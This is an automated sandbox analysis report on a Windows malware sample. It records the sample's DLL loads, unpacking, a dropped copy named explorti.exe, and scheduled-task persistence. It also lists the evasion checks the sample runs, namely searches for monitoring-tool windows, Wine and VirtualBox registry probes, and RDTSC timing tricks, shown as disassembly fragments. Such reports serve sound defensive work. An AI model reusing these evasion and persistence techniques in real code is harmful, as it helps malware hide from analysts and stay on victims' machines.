Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Detected unpacking (changes PE section rights)

Source: f3wrBtIYXx.exe

Static file information: File size 1892864 > 1048576

Source: f3wrBtIYXx.exe

Static PE information: Raw size of bzkmssua is bigger than: 0x100000 < 0x19ca00

Data Obfuscation

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Unpacked PE file: 0.2.f3wrBtIYXx.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 1.2.explorti.exe.710000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 2.2.explorti.exe.710000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 7.2.explorti.exe.710000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1d3758 should be: 0x1d0178
Source: f3wrBtIYXx.exe	Static PE information: real checksum: 0x1d3758 should be: 0x1d0178

PE file contains sections with non-standard names

Source: f3wrBtIYXx.exe	Static PE information: section name:
Source: f3wrBtIYXx.exe	Static PE information: section name: .idata
Source: f3wrBtIYXx.exe	Static PE information: section name:
Source: f3wrBtIYXx.exe	Static PE information: section name: bzkmssua
Source: f3wrBtIYXx.exe	Static PE information: section name: sxdezqxh
Source: f3wrBtIYXx.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: bzkmssua
Source: explorti.exe.0.dr	Static PE information: section name: sxdezqxh
Source: explorti.exe.0.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_0072D84C push ecx; ret

7_2_0072D85F

Source: f3wrBtIYXx.exe	Static PE information: section name: entropy: 7.988249586345587
Source: f3wrBtIYXx.exe	Static PE information: section name: bzkmssua entropy: 7.9539160203429615
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.988249586345587
Source: explorti.exe.0.dr	Static PE information: section name: bzkmssua entropy: 7.9539160203429615

Drops PE files

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior

Creates job files (autostart)

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File created: C:\Windows\Tasks\explorti.job

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Process information set: NOOPENFILEERRORBOX

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 73F280 second address: 73F284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 73EAD1 second address: 73EADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B64C8 second address: 8B64CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B661B second address: 8B6633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DF1Eh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6633 second address: 8B6638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6638 second address: 8B664F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5F64D1DF1Ch 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B68F7 second address: 8B6906 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jl 00007F5F64D1DAB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6906 second address: 8B690C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B690C second address: 8B6911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6911 second address: 8B6925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DF1Eh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6925 second address: 8B6945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6A76 second address: 8B6A80 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5F64D1DF16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6BC2 second address: 8B6BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F5F64D1DAB6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6BD1 second address: 8B6BD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6BD7 second address: 8B6BE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007F5F64D1DAB6h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6BE8 second address: 8B6BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F5F64D1DF16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6D89 second address: 8B6D93 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5F64D1DAB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6D93 second address: 8B6D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6D99 second address: 8B6D9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6D9E second address: 8B6DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BA94D second address: 8BA968 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BA9BE second address: 8BAA32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F5F64D1DF1Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push esi 0x00000012 jno 00007F5F64D1DF1Ch 0x00000018 pop esi 0x00000019 nop 0x0000001a jmp 00007F5F64D1DF22h 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007F5F64D1DF18h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000014h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b push 6F6E097Eh 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 js 00007F5F64D1DF16h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAA32 second address: 8BAA38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAA38 second address: 8BAABB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5F64D1DF18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 6F6E09FEh 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F5F64D1DF18h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D19C8h], ebx 0x00000031 push 00000003h 0x00000033 sbb dx, 77D6h 0x00000038 push 00000000h 0x0000003a mov esi, 01B97300h 0x0000003f mov ecx, dword ptr [ebp+122D2ACFh] 0x00000045 push 00000003h 0x00000047 mov esi, dword ptr [ebp+122D2A6Bh] 0x0000004d call 00007F5F64D1DF19h 0x00000052 push esi 0x00000053 jmp 00007F5F64D1DF28h 0x00000058 pop esi 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d push ebx 0x0000005e pop ebx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAE1D second address: 8BAE23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAE23 second address: 8BAE95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call 00007F5F64D1DF23h 0x00000011 mov dword ptr [ebp+122D19A2h], esi 0x00000017 pop edx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F5F64D1DF18h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D37D7h], esi 0x0000003a call 00007F5F64D1DF19h 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 jmp 00007F5F64D1DF22h 0x00000047 pop eax 0x00000048 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAE95 second address: 8BAEAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAEAA second address: 8BAEBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F5F64D1DF18h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAEBD second address: 8BAEC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAEC3 second address: 8BAEC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAEC7 second address: 8BAED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8CC5F7 second address: 8CC601 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8CC601 second address: 8CC607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8CC607 second address: 8CC60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DA394 second address: 8DA3A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D83E4 second address: 8D83E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D83E9 second address: 8D8431 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5F64D1DAD2h 0x00000008 jmp 00007F5F64D1DAC6h 0x0000000d jns 00007F5F64D1DAB6h 0x00000013 push eax 0x00000014 push edx 0x00000015 pop edx 0x00000016 jg 00007F5F64D1DAB6h 0x0000001c pop eax 0x0000001d pop edx 0x0000001e pop eax 0x0000001f pushad 0x00000020 jmp 00007F5F64D1DAC4h 0x00000025 push esi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86AA second address: 8D86AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
